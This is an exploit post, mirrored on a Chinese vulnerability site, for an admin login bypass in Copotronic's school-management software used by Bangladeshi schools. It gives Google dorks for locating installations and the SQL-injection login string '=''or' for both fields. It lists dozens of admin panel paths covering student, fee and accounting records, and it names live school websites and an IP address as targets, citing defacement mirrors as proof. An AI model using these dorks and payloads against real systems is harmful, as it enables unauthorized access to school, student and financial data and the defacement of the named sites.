Software Developed By Copotronic Shikkhangon Iqbal Hossain Rimon Admin Login Bypass Vulnerability - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1214905 漏洞类型
发布时间 2018-07-07 更新时间 2018-07-07
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018070067
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#################################################################################################

# Exploit Title : Software Developed By Copotronic Shikkhangon Iqbal Hossain Rimon Admin Login Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 06/07/2018
# Vendor Homepages : copotronic.com ~ shikkhangon.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592  [ Authentication Bypass Issues ]

#################################################################################################

# Another Exploit Title : Software IT Development By Copotronic InfoSystems Limited 
Shikkhangon CiMS Web Design Md. Iqbal Hossain Rimon Admin Login Bypass Vulnerability

# Description of the Software : Design & Develop By Copotyronic InfoSystem Ltd

Copotronic InfoSystems Ltd. is a Private-Govt. joint venture software company. With a mission to build digital Bangladesh People’s 
Republic of Bangladesh has taken initiative to promote in IT companies to enable extensive automation services and supports to 
Govt. organizations of Bangladesh to be Digital.COPOTRONIC is a dynamic organization engaged in promoting
software products, services,consultancy, Training using latest technologies to wide spectrum of corporations for over one decade. 
The quality & technology of the products reflect COPOTRONIC’s ability to produce & deliver world-class software solutions

#################################################################################################

# Google Dorks  : 

intext:''Copyright © 2018 Shikkhangon.com. All Right Reserved.''

intext:''© Copotronic InfoSystems Limited. All Right Reserved.''

inurl:''/about_college/'' site:edu.bd Copotronic

# Admin Control Panel Path =>  

/admin
/login

# Exploit : 

Username : '=''or'

Password : '=''or'

# Useable Administration Control Panel URL Links => 

/web/principal_message
/web/notice
/web/notice_list
/web/form_add
/web/form_list
/web/information_list
/web/slide
/web/about
/web/picture_gallery
/web/catagory_list
/admin/teacher_registration
/admin/teacher_list
/academic/class_teacher_assign
/admin/teacher_salary_structure
/admin/staff_registration
/admin/staff_list
/admin/student_registration
/admin/student_list
/admin/class_wise_student_list
/admin/section_wise_student_list
/admin/student_subject_assign
/admin/student_subject_view
/fees/fees_cat
/fees/class_wise_fees_management
/fees/student_fees_generate
/web/slide#
/academic/set_ca_marks
/academic/create_tabulation_sheet
/academic/marit_list
/academic/marit_list_class
/academic/mark_sheet
/academic/transcript
/academic/tabulation_sheet
/academic/tabulation_sheet_subject_wise
/academic/result_view
/accounts/master_head_create
/accounts/master_head_list
/accounts/sub1_head_create
/accounts/sub1_head_list
/accounts/sub2_head_create
/accounts/sub2_head_list
/accounts/sub3_head_create
/accounts/sub3_head_list
/accounts/navigation_head_view
/accounts/debit_voucher_entry
/accounts/debit_voucher_list
/accounts/credit_voucher_entry
/accounts/credit_voucher_list
/web/book_category_list
/web/book_list
/admin/student_sms_notice
/admin/attendance
/academic/show_class_routine
/academic/show_exam_routine
/admin/institute_information
/admin/class_list
/web/class_assign
/academic/set_class_timing
/academic/class_routine
/admin/section_list
/admin/section_assign
/admin/session_list
/admin/shift_list
/admin/subject_list
/admin/subject_assign
/academic/gpa_system
/academic/mark_distribution_system
/academic/term_subject_list
/academic/subject_wise_total_marks_list
/academic/set_exam_time
/academic/set_admit_card_initial
/academic/term_list
/admin/chartof_accounts
/admin/weekly_holiday
/admin/shift_assign

Uploaded Image Path from Admin Panel => /template/upload/principal_image/1_principal_image[RANDOMNUMBER].png  .jpg  .jpeg .gif

#################################################################################################

# Example Sites and Target Vulnerable IP Address 144.217.239.135 => 

gachuaadarshahs.edu.bd/login  => [ Proof of Concept for the Vulnerability ] => zone-h.org/mirror/id/31443090 ~ archive.is/xfYrE

dbmrhs.edu.bd/login  => [ Proof of Concept for the Vulnerability ] =>  archive.is/JhaLN

Vendor Homepage Admin Panel Path => copotronic.com/ims/shikkhangon/shikkhangon_admin/

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################